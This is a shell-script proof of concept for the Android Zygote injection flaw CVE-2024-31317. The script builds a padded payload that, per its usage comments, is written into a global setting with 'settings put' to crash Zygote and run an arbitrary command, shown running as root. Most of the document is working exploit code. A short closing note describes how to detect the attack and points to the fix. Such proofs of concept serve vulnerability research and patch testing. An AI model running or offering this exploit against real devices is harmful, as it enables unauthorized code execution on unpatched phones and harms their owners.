CVE-2024-31317 PoC 1
#!/bin/sh
# PoC prepares the payload of commands to execute through the zygote injection CVE-2024-31317:
# https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html
#
# Tested on honor-magic-v2_ver-n49; Build 7.2.0.108(C636E1R2P2); Sec patch Dec 1, 2023
#
# USAGE (android 13, with pre-13 use 12200 instead of 32768)
# host$ adb push payload.sh /sdcard/
# host$ adb shell
# shell$ settings put global hidden_api_blacklist_exemptions "$(sh /sdcard/payload.sh 8192 32768 sh -c 'sleep 200')"
# [disconnect (zygote crash)]
# host$ adb shell
# shell$ ps -A | grep sleep
# root 480 2 0 0 0 0 S [adspsleepmon-wo]
# root 20055 19988 11122152 3792 0 0 S sleep
#
# What the script does: it only builds a string and prints it on stdout; it
# does not touch the device itself (that is the `settings put` in USAGE).
#   $1     size the first block of output is padded to (buffer_size)
#   $2     size the whole output is padded to with commas (zygote_read_abort_size)
#   $3...  the command words; after the two shifts, $# is their count
# Output layout: a blank line, an 'A' run ending in the word count, one line
# per command word (first word last), a run of commas, then a final "X".
# Whether the literal "\n" sequences built below come out as real newlines
# depends on the shell's echo: mksh/dash interpret backslash escapes, bash does
# not by default. USAGE runs it under Android's sh.
#
# Defensive note: the artefact this produces is a value for the global setting
# named in USAGE that is far longer than a normal exemption list and contains
# embedded newlines plus long 'A' and ',' padding runs. A write of such a value
# to that setting, followed by the zygote crash noted above, is the detection
# handle; the fix referenced in the linked write-up is the mitigation.

# Positional parameters: two sizes first, then the command words.
buffer_size=$1
shift
zygote_read_abort_size=$1
shift
# Number of command words remaining; this count is embedded in the payload.
cmd_len=$#
# The first command word is kept aside and emitted after the others.
cmd="$1"
shift
# Only the byte length of this prefix is used, in the size arithmetic below;
# its meaning comes from the linked write-up.
prefix="6 --set-api-denylist-exemptions "
# Byte length of the prefix (echo -n is not POSIX-portable; fine on the tested shell).
prefix_len=$(echo -n "$prefix" | wc -c)
# Width of the first padded field: buffer size minus the prefix minus one byte.
add_chars=$(($buffer_size - $prefix_len - 1))
# Five newlines, then the word count left-padded with spaces to add_chars
# columns; tr turns the padding spaces into 'A'. $(...) strips trailing
# newlines only, so the leading ones survive.
payload=$(printf "\n\n\n\n\n%${add_chars}s" $cmd_len | tr ' ' A)
# Leading blank line of the output.
echo
# Append each remaining command word, separated by a literal backslash-n
# (two characters here; see the header note on echo). $(echo "$arg") also
# strips any trailing newlines from the word.
for arg in "$@"; do
payload="$payload\n$(echo "$arg")"
done
# The first command word goes last.
payload="$payload\n$(echo "$cmd")"
# Emit the payload; wc -c below counts the same bytes plus echo's trailing newline.
echo "$payload"
payload_len=$(echo "$payload" | wc -c)
# Remaining budget up to the second size, filled with commas: printf pads with
# spaces, tr converts them. If the budget is already used up printf still
# prints the single ','.
add_chars=$(($zygote_read_abort_size - ($prefix_len + $payload_len)))
printf "%${add_chars}s" ',' | tr ' ' ','
# Trailing sentinel line.
echo X